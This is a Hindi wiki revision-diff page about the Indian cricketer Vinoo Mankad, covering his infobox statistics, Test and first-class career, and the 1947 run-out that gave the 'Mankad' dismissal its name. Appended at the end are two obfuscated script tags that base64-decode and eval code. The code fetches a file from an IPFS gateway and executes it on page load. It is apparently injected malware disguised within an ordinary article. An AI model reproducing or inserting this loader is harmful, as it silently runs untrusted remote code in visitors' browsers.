Difference between revisions of "वीनू मांकड़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{सूचना बक्सा क्रिकेट खिलाड़ी
+
{{सूचना बक्सा क्रिकेट खिलाड़ी2
 
|चित्र=Vinoo-Mankad.jpg
 
|चित्र=Vinoo-Mankad.jpg
 
|चित्र का नाम=वीनू मांकड़
 
|चित्र का नाम=वीनू मांकड़
Line 9: Line 9:
 
|अविभावक=
 
|अविभावक=
 
|पत्नी=
 
|पत्नी=
|संतान=
+
|संतान=अशोक मांकड (पुत्र)
 
|मृत्यु=[[21 अगस्त]], [[1978]]   
 
|मृत्यु=[[21 अगस्त]], [[1978]]   
 
|मृत्यु स्थान= [[मुंबई]]  
 
|मृत्यु स्थान= [[मुंबई]]  
Line 16: Line 16:
 
|टीम=भारत, बंगाल, गुजरात, महाराष्ट्र, मुंबई, राजस्थान, पश्चिमी भारत  
 
|टीम=भारत, बंगाल, गुजरात, महाराष्ट्र, मुंबई, राजस्थान, पश्चिमी भारत  
 
|भूमिका=हरफनमौला  
 
|भूमिका=हरफनमौला  
|पहला टेस्ट=22 जून, 1946 इंग्लैंड के ख़िलाफ़
+
|पहला टेस्ट=[[22 जून]], [[1946]] इंग्लैंड के ख़िलाफ़
|आख़िरी टेस्ट=6 फ़रवरी, 1959 वेस्टइंडीज के ख़िलाफ़
+
|आख़िरी टेस्ट=[[6 फ़रवरी]], [[1959]] वेस्टइंडीज के ख़िलाफ़
 
|पहला वनडे=
 
|पहला वनडे=
 
|आख़िरी वनडे=
 
|आख़िरी वनडे=
 
|टेस्ट मुक़ाबले=44
 
|टेस्ट मुक़ाबले=44
 
|एकदिवसीय मुक़ाबले=
 
|एकदिवसीय मुक़ाबले=
|टी-ट्वेन्टी मुक़ाबले=
+
|प्रथम श्रेणी मुक़ाबले=233
 
|टेस्ट रन=2109
 
|टेस्ट रन=2109
 
|एकदिवसीय रन=
 
|एकदिवसीय रन=
|टी-ट्वेन्टी रन=
+
|प्रथम श्रेणी रन=11,591
 
|टेस्ट बल्लेबाज़ी औसत=31.47
 
|टेस्ट बल्लेबाज़ी औसत=31.47
 
|एकदिवसीय बल्लेबाज़ी औसत=
 
|एकदिवसीय बल्लेबाज़ी औसत=
|टी-ट्वेन्टी बल्लेबाज़ी औसत=
+
|प्रथम श्रेणी बल्लेबाज़ी औसत=34.70
 
|टेस्ट 100/50=5/6
 
|टेस्ट 100/50=5/6
 
|एकदिवसीय 100/50=
 
|एकदिवसीय 100/50=
|टी-ट्वेन्टी 100/50=
+
|प्रथम श्रेणी 100/50=26/52
 
|टेस्ट सर्वोच्च स्कोर=231
 
|टेस्ट सर्वोच्च स्कोर=231
 
|एकदिवसीय सर्वोच्च स्कोर=
 
|एकदिवसीय सर्वोच्च स्कोर=
|टी-ट्वेन्टी स्कोर=
+
|प्रथम श्रेणी स्कोर=231
|टेस्ट गेंद फेंकी=14686
+
|टेस्ट गेंद फेंकी=14,686
 
|एकदिवसीय गेंद फेंकी=
 
|एकदिवसीय गेंद फेंकी=
|टी-ट्वेन्टी फेंकी=
+
|प्रथम श्रेणी फेंकी=50,122
 
|टेस्ट विकेट=162
 
|टेस्ट विकेट=162
 
|एकदिवसीय विकेट=
 
|एकदिवसीय विकेट=
|टी-ट्वेन्टी विकेट=
+
|प्रथम श्रेणी विकेट=782
 
|टेस्ट गेंदबाज़ी औसत=32.32
 
|टेस्ट गेंदबाज़ी औसत=32.32
 
|एकदिवसीय गेंदबाज़ी औसत=
 
|एकदिवसीय गेंदबाज़ी औसत=
|टी-ट्वेन्टी गेंदबाज़ी औसत=
+
|प्रथम श्रेणी गेंदबाज़ी औसत=24.53
 
|टेस्ट गेंदबाज़ी 5=8
 
|टेस्ट गेंदबाज़ी 5=8
 
|एकदिवसीय गेंदबाज़ी 5=
 
|एकदिवसीय गेंदबाज़ी 5=
|टी-ट्वेन्टी गेंदबाज़ी 5=
+
|प्रथम श्रेणी गेंदबाज़ी 5=38
 
|टेस्ट गेंदबाज़ी 10=2
 
|टेस्ट गेंदबाज़ी 10=2
 
|एकदिवसीय गेंदबाज़ी 10=
 
|एकदिवसीय गेंदबाज़ी 10=
|टी-ट्वेन्टी गेंदबाज़ी 10=
+
|प्रथम श्रेणी गेंदबाज़ी 10=9
 
|टेस्ट सर्वोच्च गेंदबाज़ी=8/52
 
|टेस्ट सर्वोच्च गेंदबाज़ी=8/52
 
|एकदिवसीय सर्वोच्च गेंदबाज़ी=
 
|एकदिवसीय सर्वोच्च गेंदबाज़ी=
|टी-ट्वेन्टी सर्वोच्च गेंदबाज़ी=
+
|प्रथम श्रेणी सर्वोच्च गेंदबाज़ी=8/35
 
|टेस्ट कैच/स्टम्पिंग=33
 
|टेस्ट कैच/स्टम्पिंग=33
 
|एकदिवसीय कैच/स्टम्पिंग=
 
|एकदिवसीय कैच/स्टम्पिंग=
|टी-ट्वेन्टी कैच/स्टम्पिंग=
+
|प्रथम श्रेणी कैच/स्टम्पिंग=190
 
|संबंधित लेख=
 
|संबंधित लेख=
 
|शीर्षक 1=
 
|शीर्षक 1=
Line 65: Line 65:
 
|शीर्षक 4=
 
|शीर्षक 4=
 
|पाठ 4=
 
|पाठ 4=
|अन्य जानकारी=
+
|अन्य जानकारी=इनके पुत्र अशोक मांकड भी [[भारत]] के लिए 22 टेस्ट मैच खेले।
 
|बाहरी कड़ियाँ=[http://www.cricinfo.com/india/content/player/30939.html वीनू मांकड़ प्रोफ़ाइल]
 
|बाहरी कड़ियाँ=[http://www.cricinfo.com/india/content/player/30939.html वीनू मांकड़ प्रोफ़ाइल]
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''वीनू मांकड़''' ([[अंग्रेज़ी]]: ''Vinoo Mankad'') [[भारत]] के महान क्रिकेट खिलाड़ियों में से एक हैं। इनका '''पूरा नाम मूलवंतराय हिम्मतलाल मांकड़''' था।  
+
'''वीनू मांकड़''' ([[अंग्रेज़ी]]: ''Vinoo Mankad'') [[भारत]] के महान क्रिकेट खिलाड़ियों में से एक हैं। इनका पूरा नाम '''मूलवंतराय हिम्मतलाल मांकड़''' था।  
* इनका नाम विश्व के महान ऑलराउंडरों में गिना जाता है।   
+
*इनका नाम विश्व के महान ऑलराउंडरों में गिना जाता है।   
* वीनू मांकड़ का जन्म [[12 अप्रैल]], [[1917]] को [[गुजरात]] में हुआ था और इनकी मृत्यु [[21 अगस्त]], [[1978]] में [[मुंबई]] में हुई।   
+
*वीनू मांकड़ का जन्म [[12 अप्रैल]], [[1917]] को [[गुजरात]] में हुआ था और इनकी मृत्यु [[21 अगस्त]], [[1978]] में [[मुंबई]] में हुई।   
* [[1956]] में पंकज राय के साथ मिलकर उन्होंने 413 रन की ओपनिंग साझेदारी की। यह रेकॉर्ड 52 साल बाद टूटा।
 
 
*इनके बेटे अशोक मांकड़ ने भी [[भारत]] क्रिकेट टीम का प्रतिनिधित्व किया।  
 
*इनके बेटे अशोक मांकड़ ने भी [[भारत]] क्रिकेट टीम का प्रतिनिधित्व किया।  
 
==प्रमुख दल==
 
==प्रमुख दल==
 
वीनू मांकड़ ने प्रमुख टीमों में भारत, बंगाल, गुजरात, हिंदुओं, महाराष्ट्र, मुंबई, राजस्थान, पश्चिमी [[भारत]] का प्रतिनिधित्व किया।  
 
वीनू मांकड़ ने प्रमुख टीमों में भारत, बंगाल, गुजरात, हिंदुओं, महाराष्ट्र, मुंबई, राजस्थान, पश्चिमी [[भारत]] का प्रतिनिधित्व किया।  
 
==खेलने की शैली==
 
==खेलने की शैली==
वीनू मांकड़ दाएं हाथ के बल्लेबाज़ और बांये हाथ के स्पिन गेंदबाज़ थे।
+
वीनू मांकड़ दाएँ हाथ के बल्लेबाज़ और बाएँ हाथ के स्पिन गेंदबाज़ थे।
 
==भारतीय क्रिकेट में योगदान==
 
==भारतीय क्रिकेट में योगदान==
वीनू मांकड़ ने [[भारत]] के लिए 44 टेस्ट मैचों में 31.47 की औसत से पांच टेस्ट शतक सहित 2109 रन बनाए। इनका शीर्ष स्कोर 231 रहा। और साथ ही साथ गेंदबाज़ी में 32.32 की औसत से 162 विकेट भी लिये।  
+
वीनू मांकड़ ने [[भारत]] के लिए 44 टेस्ट मैचों में 31.47 की औसत से पांच टेस्ट शतक और 6 अर्द्धशतक सहित 2109 रन बनाए। इनका शीर्ष स्कोर 231 रहा और साथ ही साथ गेंदबाज़ी में 32.32 की औसत से 162 विकेट भी लिये। इसके अतिरिक्त इन्होंने 233 प्रथम श्रेणी मैचों में 34.70 की औसत से  26 शतक और 52 अर्द्धशतक सहित 11,591 रन और गेंदबाज़ी में 24.53 के शानदार औसत से 782 विकेट भी लिए।
====मांकड़ का अंदाज़-ए-आउट बना नियम====
+
==जब मांकड़ का अंदाज-ए-आउट बना नियम==
हाल ही में खेल जगत में खिलाड़ियों की बददिमागी के प्रकरण सामने आए हैं। [[दक्षिण अफ्रीका]] और वेस्ट इंडीज के टेस्ट मैच के दौरान डेल स्टेन ने विपक्षी गेंदबाज़ सुलेमान बेन की ओर थूक कर खेल भावना को आहत किया था। पर विश्व क्रिकेट में ऐसे भी क्षण आए जो पहले बदतमीजी करार दिए गए और बाद में [[आईसीसी]] के नियम के रूप में तब्दील हो गए। ऐसा ही एक नियम है मांकड़ आउट होना। [[भारत]] के महान क्रिकेटर वीनू मांकड़ ने इस तरीके से रन आउट करने की शुरुआत की थी। दिसंबर 1947 में [[ऑस्ट्रेलिया]] दौरे पर गई टीम इंडिया का यह किस्सा बहुत मशहूर है। हुआ यूं कि ऑस्ट्रेलिया के विरुद्ध सिडनी टेस्ट में भारतीय गेंदबाज़ वीनू मांकड़ ने विपक्षी बल्लेबाज को कुछ ऐसे आउट किया की सब दंग रह गए। मांकड़ ने गेंदबाज़ी करते हुए क्रीज तक पहुंचकर बिना गेंद फेंके नॉन स्ट्राइकिंग छोर की गिल्लियां बिखेर दीं। कंगारू बल्लेबाज बिल ब्राउन गेंद डाले जाने के पूर्व ही रन लेने की जल्दबाज़ी में क्रीज छोड़ चुके थे। मांकड़ ने गिल्ली उड़ाते ही रन आउट की अपील की और अंपायर ने उंगली उठा दी। हालाँकि मांकड़ की इस हरकत को ऑस्ट्रेलियाई मीडिया ने खेल भावना के विरुद्ध बताते हुए भर्तसना की पर दिग्गज बल्लेबाज डॉन ब्रेडमेन समेत कुछ विपक्षी खिलाड़ियों ने मांकड़ का बचाव किया। बाद में आउट करने का यह तरीका क्रिकेट के नियमों में शामिल हो गया। और इसका नाम मांकड़ पड़ गया। क्रिकेट नियमों की धारा 42.15 के अंतर्गत मांकड़ को वैधानिक कर दिया गया।  
+
हाल ही में खेल जगत में खिलाड़ियों की बददिमागी के प्रकरण सामने आए हैं। [[दक्षिण अफ्रीका]] और वेस्ट इंडीज के टेस्ट मैच के दौरान प्रसिद्ध [[गेंदबाज़]] डेल स्टेन ने विपक्षी गेंदबाज़ सुलेमान बेन की ओर थूक कर खेल भावना को आहत किया था पर विश्व क्रिकेट में ऐसे भी क्षण आए जो पहले बदतमीजी करार दिए गए और बाद में [[आईसीसी]] के नियम के रूप में तब्दील हो गए। ऐसा ही एक नियम है मांकड़ आउट होना। [[भारत]] के महान क्रिकेटर वीनू मांकड़ ने इस तरीके से रन आउट करने की शुरुआत की थी। [[दिसंबर]] [[1947]] में [[ऑस्ट्रेलिया]] दौरे पर गई टीम इंडिया का यह किस्सा बहुत मशहूर है। हुआ यूं कि ऑस्ट्रेलिया के विरुद्ध सिडनी टेस्ट में भारतीय गेंदबाज़ वीनू मांकड़ ने विपक्षी बल्लेबाज को कुछ ऐसे आउट किया की सब दंग रह गए। मांकड़ ने [[गेंदबाज़ी]] करते हुए क्रीज तक पहुँचे बिना गेंद फेंकेने वाले नॉन स्ट्राइकिंग छोर की गिल्लियां बिखेर दीं। कंगारू बल्लेबाज बिल ब्राउन गेंद डाले जाने के पूर्व ही रन लेने की जल्दबाज़ी में क्रीज छोड़ चुके थे। मांकड़ ने गिल्ली उड़ाते ही रन आउट की अपील की और अंपायर ने उंगली उठा दी। हालाँकि मांकड़ की इस हरकत को ऑस्ट्रेलियाई मीडिया ने खेल भावना के विरुद्ध बताते हुए भर्तसना की पर दिग्गज बल्लेबाज डॉन ब्रेडमेन समेत कुछ विपक्षी खिलाड़ियों ने मांकड़ का बचाव किया। बाद में आउट करने का यह तरीक़ा [[क्रिकेट]] के नियमों में शामिल हो गया और इसका नाम मांकड़ आउट पड़ गया। क्रिकेट नियमों की धारा 42.15 के अंतर्गत मांकड़ को वैधानिक कर दिया गया।  
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 09:50, 11 April 2013

vinoo maank d
vyaktigat parichay
poora nam moolavantaray himmatalal maank d
janm 12 aprail, 1917
janm bhoomi gujarat
santan ashok maankad (putr)
mrityu 21 agast, 1978
mrityu sthan muanbee
khel parichay
ballebazi shaili daean hath
geandabazi shaili baean hath
tim bharat, bangal, gujarat, maharashtr, muanbee, rajasthan, pashchimi bharat
bhoomika haraphanamaula
pahala test 22 joon, 1946 ianglaiand ke khilaf
akhiri test 6 faravari, 1959 vestiandij ke khilaf
kairiyar aank de
praroop test kriket ekadivasiy antarrashtriy pratham shreni
muqabale 44 233
banaye gaye ran 2109 11,591
ballebazi ausat 31.47 34.70
100/50 5/6 26/52
sarvochch skor 231 231
pheanki gee geandean 14,686 50,122
viket 162 782
geandabazi ausat 32.32 24.53
pari mean 5 viket 8 38
muqabale mean 10 viket 2 9
sarvochch geandabazi 8/52 8/35
kaich/stampiang 33 190
any janakari inake putr ashok maankad bhi bharat ke lie 22 test maich khele.
bahari k diyaan vinoo maank d profail

vinoo maank d (aangrezi: Vinoo Mankad) bharat ke mahan kriket khila diyoan mean se ek haian. inaka poora nam moolavantaray himmatalal maank d tha.

  • inaka nam vishv ke mahan aaularauandaroan mean gina jata hai.
  • vinoo maank d ka janm 12 aprail, 1917 ko gujarat mean hua tha aur inaki mrityu 21 agast, 1978 mean muanbee mean huee.
  • inake bete ashok maank d ne bhi bharat kriket tim ka pratinidhitv kiya.

pramukh dal

vinoo maank d ne pramukh timoan mean bharat, bangal, gujarat, hianduoan, maharashtr, muanbee, rajasthan, pashchimi bharat ka pratinidhitv kiya.

khelane ki shaili

vinoo maank d daean hath ke ballebaz aur baean hath ke spin geandabaz the.

bharatiy kriket mean yogadan

vinoo maank d ne bharat ke lie 44 test maichoan mean 31.47 ki ausat se paanch test shatak aur 6 arddhashatak sahit 2109 ran banae. inaka shirsh skor 231 raha aur sath hi sath geandabazi mean 32.32 ki ausat se 162 viket bhi liye. isake atirikt inhoanne 233 pratham shreni maichoan mean 34.70 ki ausat se 26 shatak aur 52 arddhashatak sahit 11,591 ran aur geandabazi mean 24.53 ke shanadar ausat se 782 viket bhi lie.

jab maank d ka aandaj-e-aut bana niyam

hal hi mean khel jagat mean khila diyoan ki badadimagi ke prakaran samane ae haian. dakshin aphrika aur vest iandij ke test maich ke dauran prasiddh geandabaz del sten ne vipakshi geandabaz suleman ben ki or thook kar khel bhavana ko ahat kiya tha par vishv kriket mean aise bhi kshan ae jo pahale badatamiji karar die ge aur bad mean aeesisi ke niyam ke roop mean tabdil ho ge. aisa hi ek niyam hai maank d aut hona. bharat ke mahan kriketar vinoo maank d ne is tarike se ran aut karane ki shuruat ki thi. disanbar 1947 mean aaustreliya daure par gee tim iandiya ka yah kissa bahut mashahoor hai. hua yooan ki aaustreliya ke viruddh sidani test mean bharatiy geandabaz vinoo maank d ne vipakshi ballebaj ko kuchh aise aut kiya ki sab dang rah ge. maank d ne geandabazi karate hue krij tak pahuanche bina geand pheankene vale n aaun straikiang chhor ki gilliyaan bikher dian. kangaroo ballebaj bil braun geand dale jane ke poorv hi ran lene ki jaldabazi mean krij chho d chuke the. maank d ne gilli u date hi ran aut ki apil ki aur aanpayar ne uangali utha di. halaanki maank d ki is harakat ko aaustreliyaee midiya ne khel bhavana ke viruddh batate hue bhartasana ki par diggaj ballebaj d aaun bredamen samet kuchh vipakshi khila diyoan ne maank d ka bachav kiya. bad mean aut karane ka yah tariqa kriket ke niyamoan mean shamil ho gaya aur isaka nam maank d aut p d gaya. kriket niyamoan ki dhara 42.15 ke aantargat maank d ko vaidhanik kar diya gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>